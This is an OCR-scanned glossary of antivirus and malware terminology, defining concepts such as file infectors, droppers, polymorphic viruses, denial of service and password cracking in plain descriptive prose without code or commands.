commonly  used  one  of  modifying  an  existing  file  (see  Parasitic 
Virus).  Given  the  way  command-line  interpreters  (or  shells)  of  sev- 
eral operating  systems  work,  a virus  can  copy  itself  onto  the  sys- 
tem as  an  entire  program  yet  be  sure  that  much  of  the  time, 
attempts  to  invoke  a program  will  result  in  the  virus’  code  being 
run  first.  Such  programs  are  known  as  companion  viruses  and 
there  are  several  forms  of  this  infection  method. 

Constructor  Kit,  Generator  Kit 

Some  virus  writers  are  not  content  with  writing  their  own  viruses 
and  have  wondered  about  bringing  the  ‘opportunity’  of  becoming 
a virus  writer  to  the  masses.  The  solution  to  this  is  usually  some 
form  of  ‘construction  kit’— a program  even  a non-programmer  can 
run,  feed  some  parameters  into  and  then  produce  a virus. 

Crack 

Any  software  designed  to  modify  other  software  for  the  purpose  of 
removing  usage  restrictions.  An  example  is  a ‘patcher’  or  ‘patch 
generator’  that  will  replace  bytes  at  specified  locations  in  a file, 
rendering  it  as  good  as  a fully-licensed  version. 

Data  Diddlers 

Data  Diddlers  is  a popular  name  for  a virus  that  contains  a data 
modifying  payload.  This  type  of  virus  may,  for  instance,  change  Os  to 
9s  in  an  MS  Excel  spreadsheet  or  it  may  even  replace  certain  words. 

Checksum 

An  identifying  number  calculated  from  file  characteristics.  The 
slightest  change  in  a file  changes  its  checksum.  This  is  used  to  ensure 
that  you  have  the  exact  same  file  as  the  one  written  by  the  author. 

Clean,  Disinfect 

To  remove  a virus  or  other  malicious  software  from  a computer, 
file  or  disk. 
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COM  File 

A type  of  executable  file  that  is  limited  to  64  KB.  These  simple  files 
are  often  used  for  utility  programs  and  small  routines.  Because 
COM  files  are  executable,  viruses  can  infect  them.  This  file  type 
has  the  extension  COM. 

Cookie 

Cookies  are  blocks  of  text  placed  in  a file  on  your  computer’s  hard 
disk.  Web  sites  use  cookies  to  identify  users  who  revisit  the  site. 
Cookies  might  contain  login  or  registration  information,  “shop- 
ping cart”  information  or  user  preferences.  When  a server  receives 
a browser  request  that  includes  a cookie,  the  server  can  use  the 
information  stored  in  the  cookie  to  customise  the  Web  site  for  the 
user.  Cookies  can  be  used  to  gather  more  information  about  a user 
than  would  be  possible  without  them. 

DDoS 

Distributed  Denial  of  Service.  Attempts  to  DoS  large  sites  using 
most  forms  of  resource  exhaustion  attack,  and  particularly  net- 
work bandwidth  wasting  strategies,  are  often  impossible  for  a sin- 
gle attacking  machine  because  of  the  sheer  scale  of  resources 
available  to  the  attacked  site. 

Denial  of  Service,  DoS 

An  attack  on  a computer  system  intended  to  reduce,  or  entirely  block, 
the  level  of  service  that  ‘legitimate  clients’  can  receive  from  that  sys- 
tem. These  range  in  scope  from  network  bandwidth  wasting  and/or 
swamping  through  exhausting  various  machine  resources  (such  as 
memory,  disk  space,  thread  or  process  handles)  required  by  the 
process(es)  providing  the  service.  They  usually  work  by  exploiting  vul- 
nerabilities that  eventually  crash  the  service  process  or  the  underly- 
ing system.  Although  not  commonly  associated  with  viruses,  denial 
of  service  components  are  included  in  some  viral  payload  routines. 

Destructiveness 

This  is  measured  based  on  the  amount  of  damage  that  a malicious 
program  can  possibly  achieve  once  a computer  has  been  infected. 
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These  metrics  can  include  attacks  to  important  operating  system 
files,  triggered  events,  clogging  e-mail  servers,  deleting  or  modify- 
ing files,  releasing  confidential  information,  performance  degra- 
dation, compromising  security  settings,  and  the  ease  with  which 
the  damage  may  be  fixed. 

Dialler 

Software  that  dials  a phone  number.  Some  dialers  connect  to  local 
Internet  Service  Providers  and  are  beneficial  as  configured.  Others 
connect  to  toll  numbers  without  user  awareness  or  permission. 

Direct  Action  Virus 

A virus  that  attempts  to  locate  and  infect  one  or  more  targets  when 
it  is  run  and  then  exits,  is  called  a direct  action  virus.  In  single-task- 
ing operating  systems  such  as  DOS,  direct  action  viruses  usually  only 
infect  a small  number  of  targets  during  each  run,  as  the  ‘find  then 
infect’  process  slows  the  normal  execution  of  the  infected  host  from 
which  the  virus  is  running  and  significant  slowing  of  a machine  is 
likely  to  warn  its  user  of  the  presence  of  something  ‘untoward1. 

DOS 

Disk  Operating  System-most  famously,  MS  DOS  and  IBM  DOS,  but 
also  DR  DOS  and  others. 

Downloader 

A downloader  is  a program  that  automatically  downloads  and 
runs  and/or  installs  other  software  without  the  user’s  knowledge 
or  permission. 

Dropper,  Injector 

A program  that  installs  a virus,  but  is  not,  itself,  infected  is  known 
as  a dropper.  These  are  not  very  common  and  most  are  used  to 
install  boot  viruses. 

Disinfection 

Most  anti-virus  software  carries  out  disinfection  after  reporting 
the  presence  of  a virus.  During  disinfection,  the  virus  may  be 
removed  and,  whenever  possible,  any  affected  data  is  recovered. 
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DOC  File 

A Microsoft  Word  Document  File.  In  the  past,  these  files  contained 
only  document  data,  but  with  many  newer  versions  of  Microsoft 
Word,  DOC  files  also  include  small  programs  called  macros.  Many 
virus  authors  use  the  macro  programming  language  to  associate 
macros  with  DOC  files.  This  file  type  has  the  extension  DOC. 

EEPROM 

Electrically  Erasable  and  Programmable  Read-Only  Memory.  A type 
of  ROM  whose  contents  are  non-volatile,  but  modifiable  through 
the  application  of  appropriate  chip  reprogramming  voltages. 

EICAR 

European  Institute  for  Computer  Antivirus  Research.  A group  of 
academics,  researchers,  law  enforcement  specialists  and  other 
technologists  united  against  writing  and  proliferation  of  mali- 
cious code  such  as  computer  viruses  or  trojan  horses,  and  against 
computer  crime,  fraud  and  the  misuse  of  computers  or  networks 

E-mail  Worm 

A commonly  used  misnomer  for  mass  mailing  viruses 

Emulator 

A commonly  used  method  for  detecting  polymorphic  viruses  is  to 
simulate  running  part  of  a program’s  code  in  an  emulator.  The 
purpose  is  to  see  if  the  code  decrypts  known  virus  code.  There  are 
several  essentially  irresolvable  issues  with  emulator  design.  For 
example,  ensuring  they  don’t  run  for  ‘too  long’  on  each  file  thus 
slowing  the  scanner  down,  and  making  them  complex  enough  to 
include  sufficient  aspects  of  the  environment  they  simulate  that 
anti-emulation  and  emulation  detection  techniques  employed  in 
some  viruses  do  not  reduce  their  usefulness. 

Encrypted  Virus 

An  early  attempt  at  evading  scan  string  driven  virus  detectors  was 
self  encryption  with  a variable  key. 
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Encryption  Tool 

Any  software  that  can  be  used  to  scramble  documents,  software, 
or  systems  so  that  only  those  possessing  a valid  key  are  able  to 
unscramble  it.  Encryption  tools  are  used  to  secure  information; 
sometimes  unauthorised  use  of  encryption  tools  in  an  organisa- 
tion is  a cause  for  concern. 

EPROM 

Erasable  and  Programmable  Read-Only  Memory.  A type  of  ROM 
whose  contents  are  non-volatile  but  modifiable  through  the  appli- 
cation of  appropriate  chip  reprogramming  voltages. 

Error  Hijacker 

Any  software  that  resets  your  browser’s  settings  to  display  a new 
error  page  when  a requested  URL  is  not  found.  Hijacks  may  reroute 
your  information  and  address  requests  through  an  unseen  site, 
capturing  that  info.  In  such  hijacks,  your  browser  may  behave  nor- 
mally, but  be  slower. 

Exploit 

A way  of  breaking  into  a system.  An  exploit  takes  advantage  of  a 
weakness  in  a system  in  order  to  hack  it.  Exploits  are  the  root  of 
the  hacker  culture. 

exe  File 

An  executable  file;  as  contrasted  with  a document  or  data  file. 
Usually,  executed  by  double-clicking  its  icon  or  a shortcut  on  the 
desktop,  or  by  entering  the  name  of  the  program  at  a command 
prompt.  Executable  files  can  also  be  executed  from  other  pro- 
grams, batch  files  or  various  script  files. 

False  Positive,  False  Negative 

These  terms  derive  from  their  use  in  statistics.  If  it  is  claimed  that 
a file  or  boot  sector  is  infected  by  a virus  when  in  reality  it  is  clean, 
a false  positive  (or  Type-I)  error  is  said  to  have  occurred. 
Conversely,  if  a file  or  boot  sector  that  is  infected  is  claimed  to  not 
be  infected,  a false  negative  (or  Type-II)  error  has  been  made.  From 
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an  antivirus  perspective,  false  negatives  probably  seem  more  seri- 
ous than  false  positives,  but  both  are  undesirable. 

Fast Infector 

When  programs  infected  with  common  file  infectors  are  run,  the 
virus  code  usually  gets  control  first.  It  then  checks  it  has  not 
already  gone  resident,  copies  itself  into  memory,  and  hooks  a sys- 
tem interrupt  or  event  handler  associated  with  the  host  platform’s 
‘load  and  execute’  function.  When  that  function  is  subsequently 
called,  the  virus’  infection  routine  runs,  checking  whether  the 
program  that  is  about  to  run  has  been  infected  already,  and  if 
not,  infects  it. 

Mass  Mailer,  Fast  Mailer 

A virus  that  distributes  itself  via  e-mail  to  multiple  addressees  at 
once  is  known  as  a mass  mailer. 

FAT,  File  Allocation  Table 

A crucial  part  of  the  standard  file  systems  employed  in  all  versions 
of  DOS  and  Windows  9x.  The  FAT  records  the  chaining  of  disk  clus- 
ters and  the  final  cluster  in  a file.  A file’s  first  cluster  is  stored  in 
its  directory  entry  and  also  acts  as  an  offset  into  the  FAT’s  chain- 
ing table  so  the  rest  of  the  file  can  be  located. 

Field  Sample,  Field  Virus,  In  the  Field 

Sometimes  viruses  are  said  to  be  ‘in  the  field’  or  ‘reported  from 
the  field’.  This  may  be  loose  usage  of  the  term,  or  it  may  be  to  draw 
the  distinction  between  viruses  that  have  been  seen  in  a small 
number  of  real-world  infection  incidents  (‘in  the  field’)  and  those 
that  have  reached  the  top  half  of  the  WildList  (‘In  the  Wild’). 

File  Infector 

These  are  viruses  that  attach  themselves  to  (or  replace;  see 
Companion  Virus)  .COM  and  .EXE  files,  although  in  some  cases 
they  will  infect  files  with  other  extensions  such  as  .SYS,  .DRV,  .BIN, 
.OVL,  .CPL,  .DLL,  .SCR  and  others.  The  most  common  file  viruses  are 
resident  viruses,  loading  into  memory  at  the  time  the  first  copy  is 
run,  and  taking  clandestine  control  of  the  computer.  Such  viruses 
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commonly  infect  additional  program  files  as  they  are  run  or  even 
just  accessed.  But  there  are  many  non-resident  viruses,  too,  which 
simply  infect  one  or  more  files  whenever  an  infected  file  is  run. 

File  Race  Condition 

Some  applications  store  information  in  unsecured  files  and  fold- 
ers like  the  temp  directory.  A file  race  condition  occurs  where  an 
attacker  has  the  chance  to  modify  these  files  before  the  original 
application  has  finished  with  them.  If  the  attacker  successfully 
monitors,  attacks  and  edits  these  temp  files,  the  original  applica- 
tion will  then  process  them  as  if  they  were  legitimate.  The  name 
of  this  kind  of  attack  is  from  the  attackers  ‘race  to  edit  the  file’. 

Firewall  Killer 

Any  hacker  tool  intended  to  disable  a user’s  personal  firewall. 
Some  will  also  disable  resident  anti-virus  software. 

Flash  Memory 

Flash  memory  became  of  interest  to  antivirus  researchers  when 
the  full  measure  of  CIH’s  payload  was  decoded.  Because  the  BIOS 
of  most  Pentium-class  and  later  PCs  is  shipped  on  a flash  memory 
chip  and  most  mainboard  and  system  designs  result  in  write-mode 
for  that  memory  being  readily  enabled,  the  BIOS  of  a PC  can  no 
longer  be  considered  ‘carved  in  stone’. 

Flooder 

A program  that  overloads  a connection  by  any  mechanism,  such  as 
fast  pinging,  causing  a DoS  attack. 

FTP  Server 

When  installed  without  user  awareness,  an  FTP  server  allows  an 
attacker  to  download  any  file  in  the  user’s  machine,  to  upload 
new  files  to  that  machine,  and  to  replace  any  existing  file  with 
an  uploaded  file. 

FDISK/MBR 

If  you  have  MS-DOS  version  5.0  or  later,  the  command  “FDISK 
/MBR”  can  remove  viruses  which  infect  the  master  boot  sector  but 
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do  not  encrypt  it.  Using  this  command  can  produce  unexpected 
results  and  cause  unrecoverable  damage. 

Firewall 

A firewall  prevents  computers  on  a network  from  communicat- 
ing directly  with  external  computer  systems.  A firewall  typically 
consists  of  a computer  that  acts  as  a barrier  through  which  all 
information  passing  between  the  networks  and  the  external  sys- 
tems must  travel.  The  firewall  software  analyses  information 
passing  between  the  two  and  rejects  it  if  it  does  not  conform  to 
pre-configured  rules. 

Germ 

A first  generation  sample  of  a virus.  Technically,  the  term  is 
reserved  for  forms  of  the  virus  that  are  in  some  way  ‘special’,  such 
that  another  sample  could  not  be  produced  as  the  result  of  a nor- 
mal infection  event. 

Ghost  Positive 

This  is  a specific  form  of  false  positive,  in  which  the  error  is  due  to 
‘leftover  pieces’  or  ‘remnants’  of  a virus  that  are  incorrectly  detect- 
ed and  reported  as  an  infection.  As  the  virus  is  not  present  or  pres- 
ent but  inactive,  it  is  erroneous  for  a scanner  to  report  an  infection. 

Globbing 

Globbing  is  the  use  of  wildcard  characters  or  arguments  to  great- 
ly increase  the  amount  of  data  requested.  An  example  is  “dir  *.*" 
in  DOS,  this  command  is  asking  for  all  file  names  with  all  file 
extensions  (everything)  in  the  current  directory.  By  making  glob- 
bing requests  to  a Web  server  it  is  sometimes  possible  to  cause  a 
Denial  of  Service  attack  as  the  server  is  too  busy  to  deal  with 
legitimate  requests. 

Heuristic  Analysis,  Heuristic  Scan 

This  is  Behaviour-based  analysis  of  a computer  program  by  anti-virus 
software  to  identify  a potential  virus.  Often  heuristic  scanning  pro- 
duces false  alarms  when  a clean  program  might  behave  as  a virus. 
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Hijacking 

This  is  an  attack  whereby  an  active,  established,  session  is  inter- 
cepted and  used  by  the  attacker.  Hijacking  can  occur  locally  if,  for 
example,  a legitimate  user  leaves  a computer  unprotected.  Remote 
hijacking  can  occur  via  the  Internet. 

Hoax 

A hoax  is  a message,  typically  distributed  via  e-mail  or  news- 
groups,  which  is  written  to  deliberately  spread  fear,  uncertainty 
and  doubt.  Just  like  the  viruses  they  purport  to  describe,  they  are 
sent  from  user(s),  slowing  network  and  Internet  traffic  and  caus- 
ing damage  ‘per  se’,  by  wasting  users  time  and  by  prompting  well 
meaning,  and  unnecessary  clean  up  procedures.  However,  these 
messages  may  be  regarding  completely  fictitious  viruses  and 
trojans,  or  they  may  even  be  misleadingly  warning  users  about 
legitimate  programs. 

Homepage  Hijacker 

Any  software  that  changes  your  browser’s  home  page  to  some 
other  site  without  your  explicit  permission.  Hijacks  may  reroute 
your  info  and  address  requests  through  an  unseen  site,  capturing 
that  info.  In  such  hijacks,  your  browser  may  behave  normally, 
but  be  slower. 

Hostile  ActiveX 

An  ActiveX  control  is  essentially  a Windows  program  that  can  be 
distributed  from  a Web  page.  These  controls  can  do  literally  any- 
thing a Windows  program  can  do.  A Hostile  ActiveX  program  does 
something  that  its  user  did  not  intend  for  it  to  do,  such  as  erasing 
a hard  drive,  dropping  a virus  or  trojan  into  your  machine,  or 
scanning  your  drive  for  tax  records  or  documents.  As  with  other 
Trojans,  a Hostile  ActiveX  control  will  normally  appear  to  have 
some  other  function  than  what  it  actually  has. 

Hostile  Java 

Browsers  include  a “virtual  machine”  that  encapsulates  the  Java 
program  and  prevents  it  from  accessing  your  local  machine.  The 
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theory  behind  this  is  that  a Java  “applet”  is  really  content  such 
as  graphics,  rather  than  full  application  software.  However,  as  of 
July,  2000,  all  known  browsers  have  had  bugs  in  their  Java 
virtual  machines  that  would  allow  hostile  applets  to  break  out 
of  this  sandbox  and  also  access  other  parts  of  the  system.  As  a 
matter  of  fact,  most  security  experts  browse  with  Java  disabled 
on  their  computers,  or  encapsulate  it  with  further 
sandboxes/virtual-machines. 

Hostile  Script 

A script  is  a text  file  with  a .VBS,  .WSH,  .JS,  .HTA,  .JSE,  .VBE  exten- 
sion that  is  executed  by  Microsoft  WScript  or  Microsoft  Scripting 
Host  Application,  interpreting  the  instructions  in  the  script  and 
acting  on  them.  A hostile  script  performs  unwanted  actions. 

HTTP  Server 

When  installed  without  user  awareness,  an  HTTP  server  allows  an 
attacker  to  use  a Web  browser  to  view  and  thus  retrieve  informa- 
tion collected  by  other  software  placed  in  the  user’s  machine. 

Hole 

Vulnerability  in  the  design  software  and/or  hardware  that  allows 
circumvention  of  security  measures. 

Host 

A term  often  used  to  describe  the  computer  file  to  which  a virus 
attaches  itself.  Most  viruses  run  when  the  computer  or  user  tries 
to  execute  the  host  file. 

Impact 

The  extent  to  which  an  attacker  may  gain  access  to  a system  and 
the  severity  of  it  on  the  organisation. 

IRC  War 

Any  tool  that  uses  Internet  Relay  Chat  for  spoofing,  eavesdrop- 
ping, sniffing,  spamming,  breaking  passwords,  harassment, 
fraud,  forgery,  electronic  trespassing,  tampering,  hacking,  nuk- 
ing, system  contamination  including  without  limitation  use  of 
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viruses,  worms  and  Trojan  horses  causing  unauthorised,  dam- 
aging or  harmful  access  or  retrieval  of  information  and  data  on 
your  computer  and  other  forms  of  activity  that  may  even  be 
considered  unlawful. 

In  The  Wild 

A virus  is  “in  the  wild”  if  it  is  verified  as  having  caused  an  infec- 
tion outside  a laboratory  situation.  Most  viruses  are  in  the  wild 
and  differ  only  in  prevalence. 

Joiner 

Loosely  a joiner  is  a program  that  takes  two  or  more  files  and 
‘sticks  them  together’.  In  antivirus  and  malware  circles  it  is  typi- 
cally used  in  reference  to  utilities  that  join  two  or  more  files 
together  with  one  or  more  of  these  being  executables. 

Joke  Program 

In  general,  they  aim  to  entertain  either  the  recipient  or  the  sup- 
plier of  the  program,  although  it  is  probably  the  case  that  the 
joke  is  usually  at  the  expense  of  the  recipient. 

Infection 

The  action  a virus  carries  out  when  it  enters  a computer  system  or 
storage  device. 

JavaScript 

JavaScript  is  a scripting  language  that  can  run  wherever  there  is  a 
suitable  script  interpreter  such  as  Web  browsers,  Web  servers,  or 
the  Windows  Scripting  Host. 

Key  Generator 

This  pertains  to  any  tool  designed  to  break  software  copy  pro- 
tection by  extracting  internally-stored  keys,  which  can  then  be 
entered  into  the  program  to  convince  it  that  the  user  is  an 
authorised  purchaser. 

Key 

The  Windows  Registry  uses  keys  to  store  computer  configuration 
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settings.  When  a user  installs  a new  program  or  the  configuration 
settings  are  otherwise  altered,  the  values  of  these  keys  change.  If 
viruses  modify  these  keys,  they  can  produce  damaging  effects. 

Logic  Bomb 

A logic  bomb  is  a type  of  trojan  horse  that  executes  when  specific 
conditions  occur.  Triggers  for  logic  bombs  can  include  a change  in 
a file,  by  a particular  series  of  keystrokes,  or  at  a specific  time  or 
date.  See  also:  Time  Bomb 

Macro 

A macro  is  a series  of  instructions  designed  to  simplify  repetitive 
tasks  within  a program  such  as  Microsoft  Word,  Excel  or  Access. 
Macros  execute  when  a user  opens  the  associated  file.  Microsoft’s 
latest  macro  programming  language  is  simple  to  use,  powerful, 
and  not  limited  to  Word  documents.  Macros  are  mini-programs 
and  can  be  infected  by  viruses.  See  also:  Macro  Virus 

Macro  Virus 

A macro  virus  is  a malicious  macro.  Macro  viruses  are  written  a 
macro  programming  language  and  attach  to  a document  file 
(such  as  Word  or  Excel).  When  a document  or  template  contain- 
ing the  macro  virus  is  opened  in  the  target  application,  the 
virus  runs,  does  its  damage  and  then  copies  itself  into  other  doc- 
uments. Continual  use  of  the  program  results  in  the  spread  of 
the  virus. 

Mail  Bomber 

Software  that  floods  a victim’s  inbox  with  hundreds  or  thousands 
of  mails.  Such  mail  generally  does  not  correctly  reveal  its  source. 

Mailbomb 

Excessively  large  e-mail  (typically  many  thousands  of  messages) 
or  many  large  messages  sent  to  a user’s  e-mail  account,  for  the 
purpose  of  crashing  the  system,  or  preventing  genuine  messages 
from  being  received. 
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Malware,  Malicious  Software 

A generic  term  used  to  describe  malicious  software  such  as:  virus- 
es, trojan  horses,  malicious  active  content  and  others. 

Malicious  Code 

A piece  of  code  designed  to  damage  a system  or  the  data  it  contains, 
or  to  prevent  the  system  from  being  used  in  its  normal  manner. 

Master  Boot  Record,  Master  Boot  Sector,  MBR,  MBS 

The  boot  sector  at  the  beginning  of  a hard  drive  (sector  location 
0,0,1  in  CHS  notation)  is  known  as  the  master  boot  sector  or,  more 
commonly,  the  master  boot  record. 

Master  Boot  Record  Infector 

A virus  that  infects  master  boot  records. 

Middle  Infector 

Refers  to  an  entry  point  obscuring  (EPO)  virus.  Due  to  design  con- 
siderations in  some  scanners,  some  non-EPO  viruses  are  referred 
to  as  middle  infectors  and  may  require  special  handling. 

Multipartite  Virus 

A virus  that  infects  two  or  more  different  target  types  is  generally 
referred  to  as  a multipartite  virus.  Early  multipartite  viruses 
infected  boot  sectors  and  DOS  executables,  but  more  esoteric  com- 
binations have  been  seen. 

Mutex 

MUTual  Exclusion  object.  Mutex  is  a program  object  that  allows 
multiple  threads  to  share  the  same  resource.  Any  thread  that 
needs  the  resource  must  lock  the  mutex  from  other  threads  while 
it  is  using  the  resource. 

Memory-Resident  Virus 

A memory-resident  virus  stays  in  memory  after  it  executes  and 
infects  other  files  when  certain  conditions  are  met.  Non-memory- 
resident  viruses  are  active  only  while  an  infected  application  runs. 
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Mutating  Virus 

A mutating  virus  changes,  or  mutates,  as  it  progresses  through  its 
host  files  making  disinfection  more  difficult.  The  term  usually 
refers  to  viruses  that  intentionally  mutate,  though  some  experts 
also  include  non-intentionally  mutating  viruses.  See  also: 
Polymorphic  Virus 

Network  Creeper 

Viruses  that  spread  to  new  hosts  by  finding  writable  network 
drives  (or  ‘shares’)  and  copying  themselves  there  or  infecting  files 
on  those  shares  are  sometimes  referred  to  as  network  creepers. 

Notifier 

Any  tool  designed  for  stealth  notification  of  an  attacker  that  a vic- 
tim has  installed  and  run  some  pest.  Such  notification  might  be 
done  by  FTP,  SMS,  SMTP,  or  other  method,  and  might  contain  a 
variety  of  information.  Often  used  in  combination  with  a Packer, 
a Binder  and  a Downloaded 

Newsgroup 

An  electronic  forum  where  readers  post  articles  and  follow-up 
messages  on  a specified  topic.  An  Internet  newsgroup  allows  peo- 
ple from  around  the  globe  discuss  common  interests.  Each  news- 
group  name  indicates  the  newsgroup’s  subject  in  terms  of  increas- 
ingly narrow  categories,  such  as  alt. comp  .virus. 

Oligomorphic  Virus 

An  encrypted  virus  that  has  several  forms  of  its  decryption  code, 
selecting  between  them  (usually  randomly)  when  writing  its 
decryptor  for  a new  replicant. 

Overwriter 

In  general,  the  simplest  form  of  virus  is  a program  that  just  copies 
itself  over  the  top  of  other  programs.  Such  viruses  are  known  as 
overwriters  and  are  commonly  the  first  types  of  viruses  written  for 
newly  ‘virused’  platforms  (e.g.  Phage,  the  first  PalmOS  virus,  dis- 
covered in  late  2000,  was  a simple  overwriter). 
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On-access  Scanner 

A real-time  virus  scanner  that  scans  disks  and  files  automatically, 
and  often  in  the  background.  An  on-access  scanner  scans  files  for 
viruses  as  the  computer  accesses  the  files. 

On-demand  Scanner 

A virus  scanner  the  user  starts  manually.  Most  on-demand  scan- 
ners allow  the  user  to  set  various  configurations  and  to  scan  spe- 
cific files,  folders  or  disks. 

On-schedule  Scanner 

A virus  scanner  the  user  schedules  to  start  automatically  at  a 
given  time. 

Peer-to-Peer,  P2P 

Any  peer-to-peer  file  swapping  program,  such  as  Audiogalaxy, 
Bearshare,  Blubster,  E-Mule,  Gnucleus,  Grolcster,  Imesh,  KaZaa, 
KaZaa  Lite,  Limewire,  Morpheus,  Shareaza,  WinMX  and  Xolox,  in 
an  organisation,  can  degrade  network  performance  and  consume 
vast  amounts  of  storage.  They  may  create  security  issues  as  out- 
siders are  granted  access  to  internal  files.  They  are  often  bundled 
with  Adware  or  Spyware. 

Packer 

A utility  which  compresses  a file,  encrypting  it  in  the  process.  It 
adds  a header  that  automatically  expands  the  file  in  memory, 
when  it  is  executed,  and  then  transfers  control  to  that  file. 

Parasitic  Virus 

Parasitic  viruses  are  those  that  modify  some  existing  code 
resource  to  effect  replication. 

Partition  Boot  Sector 

The  system  boot  sector  of  the  active  partition. 

Partition  Table 

Partition  tables  are  a crucial  part  of  how  DOS  and  related  oper- 
ating systems  understand  the  layout  of  partitions  (or  logical 
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drives)  on  hard  disks.  For  the  sake  of  interoperability,  most  OSes 
that  run  on  PCs  also  follow  the  dictates  of  these  fundamental 
partition  information  resources. 

Password  Cracker 

A tool  to  decrypt  a password  or  password  file-both  for  programs 
that  take  an  algorithmic  approach  to  cracking,  as  well  as  those 
that  use  brute  force  with  a password  cracking  word  list.  Password 
crackers  have  legitimate  uses  by  security  administrators,  who 
want  to  find  weak  passwords  in  order  to  change  them  and 
improve  system  security. 

Password  Cracking  Word  List 

A list  of  words  that  a brute  force  password  cracker  can  use  to  mus- 
cle its  way  into  a system. 

Payload 

Refers  to  the  effects  produced  by  a virus  attack.  Sometimes  refers 
to  a virus  associated  with  a dropper  or  Trojan  horse. 

Pervasiveness 

Pervasiveness  refers  to  a virus’  potential  to  spread. 

Polymorphic  Virus 

Polymorphic  viruses  create  varied  (though  fully  functional) 
copies  of  themselves  as  a way  to  avoid  detection  from  anti-virus 
software.  Some  polymorphic  virus  use  different  encryption 
schemes  and  requires  different  decryption  routines.  Thus,  the 
same  virus  may  look  completely  different  on  different  systems  or 
even  within  different  files.  Other  polymorphic  viruses  vary 
instruction  sequences  and  use  false  commands  in  the  attempt  to 
thwart  anti-virus  software.  One  of  the  most  advanced  polymor- 
phic viruses  uses  a mutation-engine  and  random-number  gener- 
ators to  change  the  virus  code  and  its  decryption  routine. 

Port  Scanner 

In  hacker  reconnaissance,  a port  scan  attempts  to  connect  to  all 
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65536  ports  on  a machine  in  order  to  see  if  anybody  is  listening 
on  those  ports. 

POP3  or  Post  Office  Protocol  3 

A protocol  that  provides  a simple,  standardised  way  for  users  to 
access  mailboxes  and  download  messages  to  their  computers. 

Prepender 

A virus  that  inserts  a copy  of  its  code  at  the  beginning  of  the  code 
of  its  victim  file  is  known  as  a prepender  or  prepending  virus. 

Probe  Tool 

A tool  that  explores  another  system,  looking  for  vulnerabilities. 
While  these  can  be  used  by  security  managers,  wishing  to  tighten 
up  their  security,  the  tools  are  as  likely  used  by  attackers  to  evalu- 
ate where  to  start  an  attack. 

Proof  of  Concept,  POC 

It  is  commonly  used  to  describe  a virus  that  is  the  first  to  infect  a 
given  platform  or  implement  a given  infection  technique. 

Password  Attacks 

A password  attack  is  an  attempt  to  obtain  or  decrypt  a legitimate 
user’s  password.  Hackers  can  use  password  dictionaries,  cracking 
programs,  and  password  sniffers  in  password  attacks.  Defense 
against  password  attacks  is  rather  limited,  but  usually  consists  of 
a password  policy  including  a minimum  length,  unrecognisable 
words,  and  frequent  changes. 

Password  Sniffing 

The  use  of  a sniffer  to  capture  passwords  as  they  cross  a network.  The 
network  could  be  a local  area  network,  or  even  the  Internet  itself.  The 
sniffer  can  be  hardware  or  software.  Most  sniffers  are  passive  and  only 
log  passwords.  The  attacker  must  then  analyse  the  logs  later. 

Piggyback 

To  gain  access  to  a system  via  an  authorised  user’s  connection. 
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Program  Infector 

A program  infector  virus  infects  other  program  files  once  an 
infected  application  is  executed  and  the  activated  virus  is  loaded 
into  memory. 

RAM,  Random  Access  Memory 

Memory  transient  programs  are  loaded  into  RAM  so  they  can  be  exe- 
cuted. It  is  the  memory  that  must  be  used  for  revisable  data  storage, 
regardless  of  the  location  of  the  program  manipulating  the  data. 

RAT,  Remote  Access  Trojan,  Remote  Access  Trapdoor 

Remote  Administration  Tool.  There  are  legitimate  remote  adminis- 
tration tools  included  with  many  network  management  products, 
with  helpdesk  and  other  support  software,  and  the  like.  These  are 
installed  with  the  system  administrator’s  knowledge  and  consent. 

Registry 

The  registry  is  a database  used  by  the  Windows32  operating  sys- 
tem (Win9x/ME/NT/2000/XP)  to  store  configuration  settings. 

Remnant 

There  are  many  approaches  to  disinfecting  virus-infected  objects. 
As  a result,  some  people  are  surprised  to  learn  that  not  all  prod- 
ucts remove  all  traces  of  a virus  when  disinfecting.  Should  this 
happen,  the  remaining  virus  code  will  not  be  ‘active’— it  will  not 
be  able  to  gain  control  in  the  flow  of  execution— so  the  disinfected 
object  is  still  ‘safe’.  These  snippets  of  leftover  code  are  sometimes 
referred  to  as  remnants. 

Resident  Virus 

A resident  virus  loads  into  memory  and  remains  inactive  until  a trig- 
ger event.  When  the  event  occurs  the  virus  activates,  either  infecting 
a file  or  disk,  or  causing  other  consequences.  All  boot  viruses  are  res- 
ident viruses  and  so  are  the  most  common  file  viruses. 

Retro-virus 

Loosely  based  on  the  biological  concept  with  the  same  name,  corn- 
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puter  viruses  that  attack  antivirus  products  are  sometimes 
referred  to  as  retro-viruses. 

Real-time  Scanner 

An  anti-virus  software  application  that  operates  as  a background 
task,  allowing  the  computer  to  continue  working  at  normal  speed, 
with  no  perceptible  slowing. 

Redirect 

The  action  used  by  some  viruses  to  point  a command  to  a different 
location.  Often  this  different  location  is  the  address  of  the  virus 
and  not  the  original  file  or  application. 

Rename 

The  action  by  which  a user  or  program  assigns  a new  name  to  a 
file.  Viruses  may  rename  program  files  and  take  the  name  of  the 
file  so  running  the  program  inadvertently  runs  the  virus. 

Repliction 

The  process  by  which  a virus  makes  copies  of  itself  in  order  to 
carry  out  subsequent  infections.  Replication  is  one  of  major  crite- 
ria separating  viruses  from  other  computer  programs. 

Resident  Extension 

A resident  extension  is  a memory-resident  portion  of  a program 
that  remains  active  after  the  program  ends.  It  essentially  becomes 
an  extension  to  the  operating  system.  Many  viruses  install  them- 
selves as  resident  extensions. 

ROM,  Read-Only  Memory 

Apart  from  its  contents  normally  not  being  modifiable,  ROM  is 
usually  also  non-volatile.  This  type  of  memory  is  traditionally  used 
to  hold  a PCs  BIOS  and  little  else,  although  various  kinds  of  ‘mod- 
ifiable ROM’  memory  technologies,  such  as  EPROM,  EEPROM  and 
flash  memory,  have  been  used  through  the  years,  with  flash  mem- 
ory being  preferred  in  recent  years. 
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Rogue  Program 

A term  the  media  use  to  denote  any  program  intended  to  damage 
programs  or  data,  or  to  breach  a system’s  security.  It  includes  tro- 
jan horse  programs,  logic  bombs,  viruses,  and  more. 

Search  Hijacker 

Any  software  that  resets  your  browser’s  settings  to  point  to  other 
sites  when  you  perform  a search. 

Self-Encrypting  Virus 

Selfencrypting  viruses  attempt  to  conceal  themselves  from  anti- 
virus programs.  Most  anti-virus  programs  attempt  to  find  viruses 
by  looking  for  certain  patterns  of  code  (known  as  virus  signatures) 
that  are  unique  to  each  virus.  Selfencrypting  viruses  encrypt 
these  text  strings  differently  with  each  infection  to  avoid  detec- 
tion. See  Self-garbling  Virus,  Encrypted  Virus 

Self-Garbling  Virus 

A self-garbling  virus  attempts  to  hide  from  anti-virus  software 
